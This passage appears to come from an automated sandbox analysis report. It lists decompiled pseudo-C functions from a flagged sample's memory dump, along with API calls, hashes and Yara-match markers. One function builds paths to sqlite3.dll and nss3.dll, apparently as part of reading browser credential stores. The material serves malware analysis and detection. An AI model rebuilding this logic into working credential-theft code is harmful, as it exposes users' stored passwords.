                                                                                                • Part of subcall function 0040E988: CoTaskMemFree.OLE32(00000000,00000000), ref: 0040EA13
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 004025E4
                                                                                              • LocalFree.KERNEL32(?), ref: 004025EE
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Similarity
                                                                                              • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                              • String ID:
                                                                                              • API String ID: 3503910906-0
                                                                                              • Opcode ID: bb52322aa56186edb046b50904625ef5fe77f2ed0f2dccde0d18aa7e90448571
                                                                                              • Instruction ID: 8b275e149f62785490509d2466391155d2af3f8991a5b00387cc308873e1222d
                                                                                              • Opcode Fuzzy Hash: bb52322aa56186edb046b50904625ef5fe77f2ed0f2dccde0d18aa7e90448571
                                                                                              • Instruction Fuzzy Hash: 7041B4B1408384BFD711DB608D44AEBBBDCBB48308F44493EFA98A21D1D678DA54DB5A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 98%
                                                                                              			E0040B3C4(intOrPtr __ecx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                              				intOrPtr _v8;
                                                                                              				void _v263;
                                                                                              				char _v264;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				signed int _t42;
                                                                                              				signed int _t45;
                                                                                              				intOrPtr* _t60;
                                                                                              				signed char _t62;
                                                                                              				intOrPtr _t63;
                                                                                              				int _t65;
                                                                                              
                                                                                              				_t61 = __ecx;
                                                                                              				_t60 = _a8;
                                                                                              				_t63 = __ecx;
                                                                                              				_v8 = __ecx;
                                                                                              				if( *(_t60 + 4) == 0x103 &&  *((intOrPtr*)(_t60 + 8)) == 0xfffffff4) {
                                                                                              					_t42 = E00408BA0( *((intOrPtr*)(__ecx + 0x370)), _t60);
                                                                                              					 *((intOrPtr*)(_t63 + 0x10c)) = 1;
                                                                                              					 *(_t63 + 0x110) = _t42;
                                                                                              				}
                                                                                              				if(_a4 == 0x101 &&  *((intOrPtr*)(_t60 + 8)) == 0xfffffffe &&  *((intOrPtr*)(_t60 + 0xc)) == 1) {
                                                                                              					_v264 = 0;
                                                                                              					memset( &_v263, 0, 0xff);
                                                                                              					E00401000(_t61,  &_v264, 0x412440);
                                                                                              					_t42 = E00406523( *((intOrPtr*)(_v8 + 0x108)),  &_v264);
                                                                                              					_t63 = _v8;
                                                                                              				}
                                                                                              				_t65 = 0;
                                                                                              				if( *((intOrPtr*)(_t60 + 8)) == 0xfffffdf8) {
                                                                                              					_t42 = SendMessageA( *(_t63 + 0x118), 0x423, 0, 0);
                                                                                              					if( *_t60 == _t42) {
                                                                                              						_t42 = GetMenuStringA( *(_t63 + 0x11c),  *(_t60 + 4), _t60 + 0x10, 0x4f, 0);
                                                                                              						 *((intOrPtr*)(_t60 + 0x60)) = 0;
                                                                                              					}
                                                                                              				}
                                                                                              				if(_a4 != 0x103) {
                                                                                              					L27:
                                                                                              					return _t42;
                                                                                              				} else {
                                                                                              					_t80 =  *((intOrPtr*)(_t60 + 8)) - 0xfffffffd;
                                                                                              					if( *((intOrPtr*)(_t60 + 8)) == 0xfffffffd) {
                                                                                              						_t42 = E0040AEAA(_t61, _t63, _t63, _t80);
                                                                                              						_t65 = 0;
                                                                                              					}
                                                                                              					if( *((intOrPtr*)(_t60 + 8)) == 0xffffff94) {
                                                                                              						_t42 = E00408ACB( *(_t60 + 0x10), _t61,  *((intOrPtr*)(_t63 + 0x370)), _t65);
                                                                                              						_t65 = 0;
                                                                                              					}
                                                                                              					if( *((intOrPtr*)(_t60 + 8)) != 0xffffff9b) {
                                                                                              						goto L27;
                                                                                              					} else {
                                                                                              						if( *((intOrPtr*)( *((intOrPtr*)(_t63 + 0x370)) + 0x1b8)) == _t65) {
                                                                                              							_t62 = 2;
                                                                                              							_t45 =  *(_t60 + 0x14) & _t62;
                                                                                              							__eflags = _t45;
                                                                                              							if(_t45 == 0) {
                                                                                              								L20:
                                                                                              								__eflags = _t45 - _t62;
                                                                                              								if(_t45 == _t62) {
                                                                                              									L23:
                                                                                              									_t42 = 0;
                                                                                              									__eflags = 0;
                                                                                              									L24:
                                                                                              									if(_t42 == _t65) {
                                                                                              										goto L27;
                                                                                              									}
                                                                                              									_t42 = _t63 + 0x25c;
                                                                                              									if( *_t42 != _t65) {
                                                                                              										goto L27;
                                                                                              									}
                                                                                              									 *_t42 = 1;
                                                                                              									return PostMessageA( *(_t63 + 0x108), 0x402, _t65, _t65);
                                                                                              								}
                                                                                              								__eflags =  *(_t60 + 0x18) & _t62;
                                                                                              								if(( *(_t60 + 0x18) & _t62) == 0) {
                                                                                              									goto L23;
                                                                                              								}
                                                                                              								L22:
                                                                                              								_t42 = 1;
                                                                                              								goto L24;
                                                                                              							}
                                                                                              							__eflags =  *(_t60 + 0x18) & _t62;
                                                                                              							if(( *(_t60 + 0x18) & _t62) == 0) {
                                                                                              								goto L22;
                                                                                              							}
                                                                                              							goto L20;
                                                                                              						}
                                                                                              						asm("sbb eax, eax");
                                                                                              						_t42 =  ~( ~(( *(_t60 + 0x18) ^  *(_t60 + 0x14)) & 0x0000f002));
                                                                                              						goto L24;
                                                                                              					}
                                                                                              				}
                                                                                              			}















                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040B42E
                                                                                              • SendMessageA.USER32 ref: 0040B472
                                                                                              • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040B48C
                                                                                              • PostMessageA.USER32 ref: 0040B52F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Message$MenuPostSendStringmemset
                                                                                              • String ID:
                                                                                              • API String ID: 3798638045-0
                                                                                              • Opcode ID: c3aa6ddd336313682f51672c6081f6f8049648b04dcffedc212cd8d1236b5249
                                                                                              • Instruction ID: e99ea3cd5ae45d968ce1bb78ba156cefd6297a3afaf0c32d246f8b1269deedf3
                                                                                              • Opcode Fuzzy Hash: c3aa6ddd336313682f51672c6081f6f8049648b04dcffedc212cd8d1236b5249
                                                                                              • Instruction Fuzzy Hash: 5041F430600611EBCB25DF24CC85A96B7A4FF14324F1482B6E958AB2C6C378DE91CBDC
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 94%
                                                                                              			E0040A119(void* __eax, void* __eflags, char* _a4, intOrPtr _a8) {
                                                                                              				intOrPtr _v8;
                                                                                              				signed int _v12;
                                                                                              				intOrPtr _v16;
                                                                                              				intOrPtr _v20;
                                                                                              				void* __ebx;
                                                                                              				signed int _t63;
                                                                                              				intOrPtr _t67;
                                                                                              				intOrPtr _t72;
                                                                                              				intOrPtr _t74;
                                                                                              				signed int _t79;
                                                                                              				void* _t84;
                                                                                              				signed int _t86;
                                                                                              				char* _t98;
                                                                                              				void* _t100;
                                                                                              				void* _t102;
                                                                                              				void* _t104;
                                                                                              				void* _t106;
                                                                                              				void* _t107;
                                                                                              
                                                                                              				_t84 = __eax;
                                                                                              				E0040892D(__eax, __eflags);
                                                                                              				_t86 = 0;
                                                                                              				_v12 = 0;
                                                                                              				while(1) {
                                                                                              					_t98 = _a4;
                                                                                              					if( *((intOrPtr*)(_t86 + _t98)) - 0x30 > 9) {
                                                                                              						break;
                                                                                              					}
                                                                                              					_t86 = _t86 + 1;
                                                                                              					if(_t86 < 1) {
                                                                                              						continue;
                                                                                              					}
                                                                                              					if(strlen(_t98) >= 3) {
                                                                                              						break;
                                                                                              					}
                                                                                              					_t79 = atoi(_a4);
                                                                                              					if(_t79 >= 0 && _t79 <  *((intOrPtr*)(_t84 + 0x20))) {
                                                                                              						_v12 =  *((intOrPtr*)( *( *((intOrPtr*)(_t84 + 0x24)) + _t79 * 4) * 0x14 +  *((intOrPtr*)(_t84 + 0x1b4))));
                                                                                              					}
                                                                                              					L21:
                                                                                              					if(_a8 != 0) {
                                                                                              						_v12 = _v12 | 0x00001000;
                                                                                              					}
                                                                                              					_t63 = _v12;
                                                                                              					 *0x41748c =  *0x41748c + 1;
                                                                                              					 *((intOrPtr*)(0x417490 +  *0x41748c * 4)) = _t63;
                                                                                              					return _t63;
                                                                                              				}
                                                                                              				_t104 = 0;
                                                                                              				__eflags =  *((intOrPtr*)(_t84 + 0x1b0));
                                                                                              				_v16 = 0;
                                                                                              				_v8 = 0;
                                                                                              				if( *((intOrPtr*)(_t84 + 0x1b0)) <= 0) {
                                                                                              					L14:
                                                                                              					_t100 = 0;
                                                                                              					__eflags =  *((intOrPtr*)(_t84 + 0x1b0));
                                                                                              					_v8 = 0;
                                                                                              					if( *((intOrPtr*)(_t84 + 0x1b0)) <= 0) {
                                                                                              						L20:
                                                                                              						goto L21;
                                                                                              					}
                                                                                              					_t106 = 0;
                                                                                              					__eflags = 0;
                                                                                              					do {
                                                                                              						_v20 = E004069D2(0, _a4);
                                                                                              						_t67 = E004069D2(0, _a4);
                                                                                              						__eflags = _v20;
                                                                                              						if(_v20 >= 0) {
                                                                                              							L18:
                                                                                              							_v12 =  *((intOrPtr*)(_t106 +  *((intOrPtr*)(_t84 + 0x1b4))));
                                                                                              							goto L19;
                                                                                              						}
                                                                                              						__eflags = _t67;
                                                                                              						if(_t67 < 0) {
                                                                                              							goto L19;
                                                                                              						}
                                                                                              						goto L18;
                                                                                              						L19:
                                                                                              						_v8 = _v8 + 1;
                                                                                              						_t100 = _t100 + 0x10;
                                                                                              						_t106 = _t106 + 0x14;
                                                                                              						__eflags = _v8 -  *((intOrPtr*)(_t84 + 0x1b0));
                                                                                              					} while (_v8 <  *((intOrPtr*)(_t84 + 0x1b0)));
                                                                                              					goto L20;
                                                                                              				}
                                                                                              				_t102 = 0;
                                                                                              				__eflags = 0;
                                                                                              				do {
                                                                                              					_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x1b4)) + _t104 + 0x10));
                                                                                              					_push(_a4);
                                                                                              					_push(_t72);
                                                                                              					L004115C4();
                                                                                              					_push(_a4);
                                                                                              					_v20 = _t72;
                                                                                              					_t74 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x34)) + _t102 + 0xc));
                                                                                              					_push(_t74);
                                                                                              					L004115C4();
                                                                                              					_t107 = _t107 + 0x10;
                                                                                              					__eflags = _v20;
                                                                                              					if(_v20 == 0) {
                                                                                              						L11:
                                                                                              						_v12 =  *(_t104 +  *((intOrPtr*)(_t84 + 0x1b4)));
                                                                                              						_v16 = 1;
                                                                                              						goto L12;
                                                                                              					}
                                                                                              					__eflags = _t74;
                                                                                              					if(_t74 != 0) {
                                                                                              						goto L12;
                                                                                              					}
                                                                                              					goto L11;
                                                                                              					L12:
                                                                                              					_v8 = _v8 + 1;
                                                                                              					_t102 = _t102 + 0x10;
                                                                                              					_t104 = _t104 + 0x14;
                                                                                              					__eflags = _v8 -  *((intOrPtr*)(_t84 + 0x1b0));
                                                                                              				} while (_v8 <  *((intOrPtr*)(_t84 + 0x1b0)));
                                                                                              				__eflags = _v16;
                                                                                              				if(_v16 != 0) {
                                                                                              					goto L20;
                                                                                              				}
                                                                                              				goto L14;
                                                                                              			}





















                                                                                              0x0040a19f
                                                                                              0x0040a1a0
                                                                                              0x0040a1a5
                                                                                              0x0040a1a8
                                                                                              0x0040a1ae
                                                                                              0x0040a1b2
                                                                                              0x0040a1b3
                                                                                              0x0040a1b8
                                                                                              0x0040a1bb
                                                                                              0x0040a1bf
                                                                                              0x0040a1c5
                                                                                              0x0040a1ce
                                                                                              0x0040a1d1
                                                                                              0x00000000
                                                                                              0x0040a1d1
                                                                                              0x0040a1c1
                                                                                              0x0040a1c3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040a1d8
                                                                                              0x0040a1d8
                                                                                              0x0040a1de
                                                                                              0x0040a1e1
                                                                                              0x0040a1e4
                                                                                              0x0040a1e4
                                                                                              0x0040a1ec
                                                                                              0x0040a1f0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000

                                                                                              APIs
                                                                                                • Part of subcall function 0040892D: ??2@YAPAXI@Z.MSVCRT ref: 0040894E
                                                                                                • Part of subcall function 0040892D: ??3@YAXPAX@Z.MSVCRT ref: 00408A15
                                                                                              • strlen.MSVCRT ref: 0040A13F
                                                                                              • atoi.MSVCRT ref: 0040A14D
                                                                                              • _mbsicmp.MSVCRT ref: 0040A1A0
                                                                                              • _mbsicmp.MSVCRT ref: 0040A1B3
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                              • String ID:
                                                                                              • API String ID: 4107816708-0
                                                                                              • Opcode ID: 04d0626d4e34a8bed9540d47d501c89c47d505d3d6eba4bb40819434c6ba53c8
                                                                                              • Instruction ID: ad5e67b725479cd3c0fe98911646f79d6f4c04cefe3616236e53ea043d5b2769
                                                                                              • Opcode Fuzzy Hash: 04d0626d4e34a8bed9540d47d501c89c47d505d3d6eba4bb40819434c6ba53c8
                                                                                              • Instruction Fuzzy Hash: 24414B75900304AFCB10DFA9C580A9ABBF5FB48308F1084BEEC05AB392D7399A51CB59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00410E8A(char* __eax, void* __edi) {
                                                                                              				unsigned int _v5;
                                                                                              				signed int _v6;
                                                                                              				signed int _v7;
                                                                                              				intOrPtr _v12;
                                                                                              				intOrPtr _v16;
                                                                                              				intOrPtr _t37;
                                                                                              				char* _t56;
                                                                                              				signed char _t57;
                                                                                              				char* _t67;
                                                                                              				void* _t68;
                                                                                              				void* _t69;
                                                                                              
                                                                                              				_t68 = __edi;
                                                                                              				_t56 = __eax;
                                                                                              				_t69 = 0;
                                                                                              				_t37 = strlen(__eax) + 0xfffffffd;
                                                                                              				_v16 = _t37;
                                                                                              				if(_t37 < 0) {
                                                                                              					L18:
                                                                                              					 *((char*)(_t69 + _t68)) = 0;
                                                                                              					return _t69;
                                                                                              				}
                                                                                              				_v12 = 0xfffffffe;
                                                                                              				_v12 = _v12 - _t56;
                                                                                              				_t5 = _t56 + 2; // 0x411004
                                                                                              				_t67 = _t5;
                                                                                              				while(1) {
                                                                                              					_t6 = _t67 - 2; // 0x75fff88b
                                                                                              					_t39 =  *_t6;
                                                                                              					if( *_t6 != 0x2e) {
                                                                                              						_v6 = E00410E56(_t39);
                                                                                              					} else {
                                                                                              						_v6 = 0x3e;
                                                                                              					}
                                                                                              					_t9 = _t67 - 1; // 0xfc75fff8
                                                                                              					_t41 =  *_t9;
                                                                                              					if( *_t9 != 0x2e) {
                                                                                              						_v5 = E00410E56(_t41);
                                                                                              					} else {
                                                                                              						_v5 = 0x3e;
                                                                                              					}
                                                                                              					_t43 =  *_t67;
                                                                                              					if( *_t67 != 0x2e) {
                                                                                              						_t57 = E00410E56(_t43);
                                                                                              					} else {
                                                                                              						_t57 = 0x3e;
                                                                                              					}
                                                                                              					_t45 =  *((intOrPtr*)(_t67 + 1));
                                                                                              					if( *((intOrPtr*)(_t67 + 1)) != 0x2e) {
                                                                                              						_v7 = E00410E56(_t45);
                                                                                              					} else {
                                                                                              						_v7 = 0x3e;
                                                                                              					}
                                                                                              					 *(_t68 + _t69) = _v5 >> 0x00000004 | _v6 << 0x00000002;
                                                                                              					if( *_t67 == 0x2d) {
                                                                                              						break;
                                                                                              					}
                                                                                              					 *(_t69 + _t68 + 1) = _t57 >> 0x00000002 | _v5 << 0x00000004;
                                                                                              					if( *((char*)(_t67 + 1)) == 0x2d) {
                                                                                              						 *((char*)(_t69 + _t68 + 2)) = 0;
                                                                                              						_t34 = _t69 + 2; // 0x2
                                                                                              						return _t34;
                                                                                              					}
                                                                                              					_t69 = _t69 + 3;
                                                                                              					 *(_t69 + _t68 - 1) = _t57 << 0x00000006 | _v7;
                                                                                              					_t25 = _t69 + 5; // 0x2
                                                                                              					_t67 = _t67 + 4;
                                                                                              					if(_t25 >= 0x3ff || _v12 + _t67 > _v16) {
                                                                                              						goto L18;
                                                                                              					} else {
                                                                                              						continue;
                                                                                              					}
                                                                                              				}
                                                                                              				 *(_t69 + _t68 + 1) = 0;
                                                                                              				_t31 = _t69 + 1; // 0x1
                                                                                              				return _t31;
                                                                                              			}















                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: strlen
                                                                                              • String ID: >$>$>
                                                                                              • API String ID: 39653677-3911187716
                                                                                              • Opcode ID: cc9d2e4949e9ff96ebc93a83fa171427e13732e23a33d014681ceaf85bfc699f
                                                                                              • Instruction ID: 69dee6f6c2e5f632f5f5b053a668a00b89048f502478ac4f4f3cd81ce8891ac8
                                                                                              • Opcode Fuzzy Hash: cc9d2e4949e9ff96ebc93a83fa171427e13732e23a33d014681ceaf85bfc699f
                                                                                              • Instruction Fuzzy Hash: D331D5318097C49ED7218B6980563EFFFA14F26304F188ADAD0E557343D2EC96CAC75A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 50%
                                                                                              			E0040BC6D(signed int __eax, void* __ecx, void* _a4) {
                                                                                              				unsigned int _t23;
                                                                                              				signed int _t25;
                                                                                              				unsigned int _t34;
                                                                                              				unsigned int _t36;
                                                                                              				void* _t40;
                                                                                              				unsigned int _t45;
                                                                                              				void* _t46;
                                                                                              				int _t47;
                                                                                              				void* _t48;
                                                                                              				void* _t50;
                                                                                              
                                                                                              				_t48 = __ecx;
                                                                                              				_t34 = __eax;
                                                                                              				_t23 =  *(__ecx + 0x10);
                                                                                              				_t36 = _t23 + __eax * 8;
                                                                                              				 *(__ecx + 0x10) = _t36;
                                                                                              				if(_t36 < _t23) {
                                                                                              					 *((intOrPtr*)(__ecx + 0x14)) =  *((intOrPtr*)(__ecx + 0x14)) + 1;
                                                                                              				}
                                                                                              				 *((intOrPtr*)(_t48 + 0x14)) =  *((intOrPtr*)(_t48 + 0x14)) + (_t34 >> 0x1d);
                                                                                              				_t25 = _t23 >> 0x00000003 & 0x0000003f;
                                                                                              				if(_t25 == 0) {
                                                                                              					L6:
                                                                                              					if(_t34 >= 0x40) {
                                                                                              						_t45 = _t34 >> 6;
                                                                                              						do {
                                                                                              							memcpy(_t48 + 0x18, _a4, 0x40);
                                                                                              							_t50 = _t50 + 0xc;
                                                                                              							E0040BD8A(_t48 + 0x18, _t48);
                                                                                              							_a4 = _a4 + 0x40;
                                                                                              							_t34 = _t34 - 0x40;
                                                                                              							_t45 = _t45 - 1;
                                                                                              						} while (_t45 != 0);
                                                                                              					}
                                                                                              					_push(_t34);
                                                                                              					_push(_a4);
                                                                                              					_push(_t48 + 0x18);
                                                                                              				} else {
                                                                                              					_t46 = 0x40;
                                                                                              					_t47 = _t46 - _t25;
                                                                                              					_t40 = _t48 + 0x18 + _t25;
                                                                                              					if(_t34 >= _t47) {
                                                                                              						memcpy(_t40, _a4, _t47);
                                                                                              						_t50 = _t50 + 0xc;
                                                                                              						E0040BD8A(_t48 + 0x18, _t48);
                                                                                              						_a4 = _a4 + _t47;
                                                                                              						_t34 = _t34 - _t47;
                                                                                              						goto L6;
                                                                                              					} else {
                                                                                              						_push(_t34);
                                                                                              						_push(_a4);
                                                                                              						_push(_t40);
                                                                                              					}
                                                                                              				}
                                                                                              				return memcpy();
                                                                                              			}













Memory Dump Source
• Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
Similarity
• API ID: memcpy
• String ID: @
• API String ID: 3510742995-2766056989
Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 93%
                                                                                              			E00406F6F(void** __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                                              				signed int _t21;
                                                                                              				signed int _t23;
                                                                                              				void* _t24;
                                                                                              				signed int _t31;
                                                                                              				void* _t33;
                                                                                              				void* _t44;
                                                                                              				signed int _t46;
                                                                                              				void* _t48;
                                                                                              				signed int _t51;
                                                                                              				int _t52;
                                                                                              				void** _t53;
                                                                                              				void* _t58;
                                                                                              
                                                                                              				_t53 = __esi;
                                                                                              				_t1 =  &(_t53[1]); // 0x0
                                                                                              				_t51 =  *_t1;
                                                                                              				_t21 = 0;
                                                                                              				if(_t51 <= 0) {
                                                                                              					L4:
                                                                                              					_t2 =  &(_t53[2]); // 0x8
                                                                                              					_t33 =  *_t53;
                                                                                              					_t23 =  *_t2 + _t51;
                                                                                              					_t46 = 8;
                                                                                              					_t53[1] = _t23;
                                                                                              					_t24 = _t23 * _t46;
                                                                                              					_push( ~(0 | _t58 > 0x00000000) | _t24);
                                                                                              					L004115D0();
                                                                                              					_t10 =  &(_t53[1]); // 0x0
                                                                                              					 *_t53 = _t24;
                                                                                              					memset(_t24, 0,  *_t10 << 3);
                                                                                              					_t52 = _t51 << 3;
                                                                                              					memcpy( *_t53, _t33, _t52);
                                                                                              					if(_t33 != 0) {
                                                                                              						_push(_t33);
                                                                                              						L004115D6();
                                                                                              					}
                                                                                              					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
                                                                                              					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
                                                                                              				} else {
                                                                                              					_t44 =  *__esi;
                                                                                              					_t48 = _t44;
                                                                                              					while( *_t48 != 0) {
                                                                                              						_t21 = _t21 + 1;
                                                                                              						_t48 = _t48 + 8;
                                                                                              						_t58 = _t21 - _t51;
                                                                                              						if(_t58 < 0) {
                                                                                              							continue;
                                                                                              						} else {
                                                                                              							goto L4;
                                                                                              						}
                                                                                              						goto L7;
                                                                                              					}
                                                                                              					_t31 = _t21 << 3;
                                                                                              					 *((intOrPtr*)(_t44 + _t31)) = _a4;
                                                                                              					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
                                                                                              				}
                                                                                              				L7:
                                                                                              				return 1;
                                                                                              			}















Memory Dump Source
• Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
Similarity
• API ID: ??2@??3@memcpymemset
• String ID:
• API String ID: 1865533344-0
Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 37%
                                                                                              			E0040EFAE(char* __esi, char _a4, intOrPtr _a8) {
                                                                                              				void* _v8;
                                                                                              				char* _v16;
                                                                                              				intOrPtr _v20;
                                                                                              				intOrPtr _v24;
                                                                                              				intOrPtr _v28;
                                                                                              				intOrPtr _v32;
                                                                                              				intOrPtr _v36;
                                                                                              				char _v40;
                                                                                              				char _v304;
                                                                                              				char* _t18;
                                                                                              				char* _t22;
                                                                                              				char* _t23;
                                                                                              				intOrPtr* _t24;
                                                                                              				intOrPtr* _t26;
                                                                                              				intOrPtr _t30;
                                                                                              				void* _t35;
                                                                                              				char* _t36;
                                                                                              
                                                                                              				_t18 =  &_v8;
                                                                                              				_t30 = 0;
                                                                                              				__imp__SHGetMalloc(_t18);
                                                                                              				if(_t18 >= 0) {
                                                                                              					_v40 = _a4;
                                                                                              					_v28 = _a8;
                                                                                              					_t22 =  &_v40;
                                                                                              					_v36 = 0;
                                                                                              					_v32 = 0;
                                                                                              					_v24 = 4;
                                                                                              					_v20 = E0040EF36;
                                                                                              					_v16 = __esi;
                                                                                              					__imp__SHBrowseForFolderA(_t22, _t35);
                                                                                              					_t36 = _t22;
                                                                                              					if(_t36 != 0) {
                                                                                              						_t23 =  &_v304;
                                                                                              						__imp__SHGetPathFromIDListA(_t36, _t23);
                                                                                              						if(_t23 != 0) {
                                                                                              							_t30 = 1;
                                                                                              							strcpy(__esi,  &_v304);
                                                                                              						}
                                                                                              						_t24 = _v8;
                                                                                              						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
                                                                                              						_t26 = _v8;
                                                                                              						 *((intOrPtr*)( *_t26 + 8))(_t26);
                                                                                              					}
                                                                                              				}
                                                                                              				return _t30;
                                                                                              			}




















APIs
• SHGetMalloc.SHELL32(?), ref: 0040EFBE
• SHBrowseForFolderA.SHELL32(?), ref: 0040EFF0
• SHGetPathFromIDListA.SHELL32(00000000,?), ref: 0040F004
• strcpy.MSVCRT(?,?), ref: 0040F017
Memory Dump Source
• Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
Similarity
• API ID: BrowseFolderFromListMallocPathstrcpy
• String ID:
• API String ID: 409945605-0
Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 80%
                                                                                              			E0040A437(void* __esi) {
                                                                                              				void* _v260;
                                                                                              				char _v516;
                                                                                              				void* __ebx;
                                                                                              				char* _t16;
                                                                                              				signed short _t25;
                                                                                              				signed short _t27;
                                                                                              				void* _t28;
                                                                                              
                                                                                              				_t28 = __esi;
                                                                                              				_push(E00408647( *((intOrPtr*)(__esi + 0x370))));
                                                                                              				_t25 = 4;
                                                                                              				sprintf( &_v260, E004078FF(_t25));
                                                                                              				_t16 = E00408BDE( *((intOrPtr*)(__esi + 0x370)), 0);
                                                                                              				if(_t16 > 0) {
                                                                                              					_push(_t16);
                                                                                              					_t27 = 5;
                                                                                              					sprintf( &_v516, E004078FF(_t27));
                                                                                              					_t16 = strcat( &_v260,  &_v516);
                                                                                              				}
                                                                                              				if( *((intOrPtr*)(_t28 + 0x108)) != 0) {
                                                                                              					return SendMessageA( *(_t28 + 0x114), 0x401, 0,  &_v260);
                                                                                              				}
                                                                                              				return _t16;
                                                                                              			}











                                                                                              APIs
                                                                                                • Part of subcall function 004078FF: LoadStringA.USER32 ref: 004079C8
                                                                                                • Part of subcall function 004078FF: memcpy.MSVCRT ref: 00407A07
                                                                                              • sprintf.MSVCRT ref: 0040A45D
                                                                                              • SendMessageA.USER32 ref: 0040A4C0
                                                                                                • Part of subcall function 004078FF: strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,75144DE0), ref: 0040797A
                                                                                                • Part of subcall function 004078FF: strlen.MSVCRT ref: 00407998
                                                                                              • sprintf.MSVCRT ref: 0040A487
                                                                                              • strcat.MSVCRT(?,?,?,00000000,00000000), ref: 0040A49A
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: sprintf$LoadMessageSendStringmemcpystrcatstrcpystrlen
                                                                                              • String ID:
                                                                                              • API String ID: 919693953-0
                                                                                              • Opcode ID: 90207433884269e3a26f13c39c42963f5ff8dc1025de2d2684d4a636a9e51624
                                                                                              • Instruction ID: 75288aada6eb4f7a447a9cf13bdf828529425e42ebb21a5188d22772f738aad9
                                                                                              • Opcode Fuzzy Hash: 90207433884269e3a26f13c39c42963f5ff8dc1025de2d2684d4a636a9e51624
                                                                                              • Instruction Fuzzy Hash: 2601DBB250030466D721B775DD86FEB73AC6F00304F40447BB74AF6082DABCE9808B29
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 87%
                                                                                              			E0040F3BA(char* _a4) {
                                                                                              				void _v267;
                                                                                              				char _v268;
                                                                                              				int _t12;
                                                                                              				signed int _t16;
                                                                                              
                                                                                              				_v268 = 0;
                                                                                              				memset( &_v267, 0, 0x104);
                                                                                              				_t12 = strlen(_a4);
                                                                                              				_t5 = strlen("sqlite3.dll") + 1; // 0x1
                                                                                              				if(_t12 + _t5 >= 0x104) {
                                                                                              					_v268 = 0;
                                                                                              				} else {
                                                                                              					E004062AD( &_v268, _a4, "sqlite3.dll");
                                                                                              				}
                                                                                              				_t16 = E0040614B( &_v268);
                                                                                              				asm("sbb eax, eax");
                                                                                              				return  ~( ~_t16);
                                                                                              			}








                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040F3DC
                                                                                              • strlen.MSVCRT ref: 0040F3E4
                                                                                              • strlen.MSVCRT ref: 0040F3F1
                                                                                                • Part of subcall function 004062AD: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062B5
                                                                                                • Part of subcall function 004062AD: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062C4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: strlen$memsetstrcatstrcpy
